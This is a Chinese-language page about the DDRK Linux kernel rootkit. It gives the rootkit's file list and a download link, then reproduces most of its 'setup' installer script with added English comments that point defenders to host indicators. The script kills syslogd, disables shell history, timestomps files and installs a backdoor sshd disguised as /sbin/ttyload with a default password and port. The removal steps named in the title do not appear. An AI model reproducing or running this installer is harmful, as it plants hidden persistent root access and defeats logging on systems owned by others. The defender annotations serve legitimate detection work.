Linux下rootkit-ddrk攻击获得root权限以及清除方法
DDRK 是一个 Linux 内核级 rootkit,结合了 shv 和 adore-ng 各自的优点:用户态部分是一个伪装过的后门 sshd,内核态部分是一个负责隐藏文件和进程的模块(rk.ko)。
DDRK中包含的文件:
netstat #替换系统中的netstat,从ssh配置文件中读取端口并隐藏
rk.ko #内核模块,实现文件和进程的隐藏功能
setup #rootkit安装文件
tty #ava工具
bin.tgz
---ttymon
---sshd.tgz
---.sh
---shdcf2 #sshd配置文件
---shhk
---shhk.pub
---shrs
---sshd #sshd主程序
DDRK下载地址:http://www.sectop.com/soft/ddrk.tgz
需要说明的是,setup 脚本本身并不提权:它一开始就检查 whoami 是否为 root,否则直接退出。攻击者必须先通过其他途径取得 root,再上传并运行这些文件;DDRK 的作用是隐藏并持久化这一 root 访问(伪装成 /sbin/ttyload 的后门 sshd、用 rk.ko 隐藏文件和进程、替换 netstat 隐藏监听端口),而不是"获得"root。
setup内容如下:
#!/bin/bash
# DDRK `setup` installer as reproduced on the page, annotated for defenders.
# The script lines are unchanged; only comments were added. Host indicators
# created or touched by the visible portion:
#   /etc/sh.conf      unsalted MD5 of the backdoor password (md5sum output)
#   /lib/libsh.so     a DIRECTORY despite the .so name; holds the sshd config/keys
#   /usr/lib/libsh    directory; receives the bundled .bashrc
#   /sbin/ttyload     the backdoor sshd, renamed
#   /sbin/ttymon      dropped from bin.tgz
#   TCP port 43958    default backdoor sshd port (overridable via $2)
# The page's file list says netstat is replaced to hide that port, so confirm
# the listener from outside the host (network scan) rather than trusting the
# host's own netstat.
# NOTE(review): the listing stops after the ttymon chmod; rk.ko is never loaded
# and nothing is started in what is shown, so the rest of setup (and the
# removal steps the page title promises) is not on this page.
##########define variables##########
# NOTE(review): the `//...` tails on the next two lines are page-author
# annotations ("default password" / "default port"), NOT shell comments. As
# pasted, `DEFPASS=123456 //默认密码` runs `//默认密码` as a command with DEFPASS
# set only in that command's environment, so DEFPASS and DEFPORT are empty in
# the script itself; the original rootkit presumably had plain assignments.
DEFPASS=123456 //默认密码
DEFPORT=43958 //默认端口
BASEDIR=`pwd`
# Install locations; both are reassigned to the same values at "creating dirs".
SSHDIR=/lib/libsh.so
HOMEDIR=/usr/lib/libsh
# Anti-forensics: disable shell history for this session.
unset HISTFILE;unset HISTSIZE;unset HISTORY;unset HISTSAVE;unset HISTFILESIZE
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
##########check is root##########
# The installer does not escalate privileges: it requires an existing root shell.
if [ "$(whoami)" != "root" ]; then
echo "BECOME ROOT AND TRY AGAIN"
echo ""
exit
fi
##########extract all tar##########
# Unpack bin.tgz (ttymon, sshd.tgz, .sh/) and the nested sshd.tgz, then delete
# both archives so they do not remain on disk.
tar zxf bin.tgz
cd bin
tar zxf sshd.tgz
rm -rf ./sshd.tgz
cd $BASEDIR
rm -rf bin.tgz
cd $BASEDIR
##########kill syslogd##########
# Anti-logging: syslogd is killed before any file is placed. A gap in syslog
# starting at install time is a detection opportunity.
killall -9 syslogd >/dev/null 2>&1
sleep 2
##########remove sh.conf##########
# Remove a previous install's password file. The `//...` tail is again a page
# annotation ("password file hashed with md5sum" -- hashed, not encrypted);
# rm -rf silently ignores that nonexistent extra path.
if [ -f /etc/sh.conf ]; then
rm -rf /etc/sh.conf //经过md5sum加密过的密码文件
fi
##########initialize sshd configuration##########
# Backdoor password: $1 if given, else $DEFPASS. Stored as the unsalted MD5 of
# the password exactly as md5sum prints it (hash followed by "  -").
if test -n "$1" ; then
echo "Using Password : $1"
cd $BASEDIR/bin
echo -n $1|md5sum > /etc/sh.conf
else
echo "No Password Specified, using default - $DEFPASS"
echo -n $DEFPASS|md5sum > /etc/sh.conf
fi
# Timestomping: copy /bin/ls's atime/mtime onto the new file. touch cannot set
# ctime, so the inode change time still reflects the real install time.
touch -acmr /bin/ls /etc/sh.conf
chown -f root:root /etc/sh.conf
# Backdoor sshd port: $2 if given, else $DEFPORT. A "Port N" line is written
# first, the bundled shdcf2 template is appended, and the result becomes
# .sh/shdcf (the config the renamed sshd will read).
if test -n "$2" ; then
echo "Using ssh-port : $2"
echo "Port $2" >> $BASEDIR/bin/.sh/sshd_config
cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2
mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf
else
echo "No ssh-port Specified, using default - $DEFPORT"
echo "Port $DEFPORT" >> $BASEDIR/bin/.sh/sshd_config
cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2
mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf
fi
###########creating dirs##########
# Same values as at the top of the script (redundant reassignment).
SSHDIR=/lib/libsh.so
HOMEDIR=/usr/lib/libsh
# Wipe any previous install, then recreate both directories and timestomp them.
if [ -d /lib/libsh.so ]; then
rm -rf /lib/libsh.so
fi
if [ -d /usr/lib/libsh ]; then
rm -rf /usr/lib/libsh/*
fi
mkdir $SSHDIR
touch -acmr /bin/ls $SSHDIR
mkdir $HOMEDIR
touch -acmr /bin/ls $HOMEDIR
# Move the sshd config, host keys and binary into /lib/libsh.so and the
# bundled .bashrc into /usr/lib/libsh.
cd $BASEDIR/bin
mv .sh/* $SSHDIR/
mv .sh/.bashrc $HOMEDIR
# Remove an older backdoor binary. chattr first clears immutable/append-only
# and the other listed attributes so the rm can succeed.
if [ -f /sbin/ttyload ]; then
chattr -AacdisSu /sbin/ttyload
rm -rf /sbin/ttyload
fi
if [ -f /usr/sbin/ttyload ]; then
rm -rf /usr/sbin/ttyload
fi
if [ -f /sbin/ttymon ]; then
rm -rf /sbin/ttymon
fi
# The backdoor sshd is installed under the innocuous name /sbin/ttyload,
# made world-executable, and timestomped like the files above.
mv $SSHDIR/sshd /sbin/ttyload
chmod a+xr /sbin/ttyload
chmod o-w /sbin/ttyload
touch -acmr /bin/ls /sbin/ttyload
# Kill any running instance of a previous backdoor before the new one is used.
kill -9 `pidof ttyload` >/dev/null 2>&1
# ttymon is dropped from bin.tgz; its role is not shown in this listing.
mv $BASEDIR/bin/ttymon /sbin/ttymon
chmod a+xr /sbin/ttymon
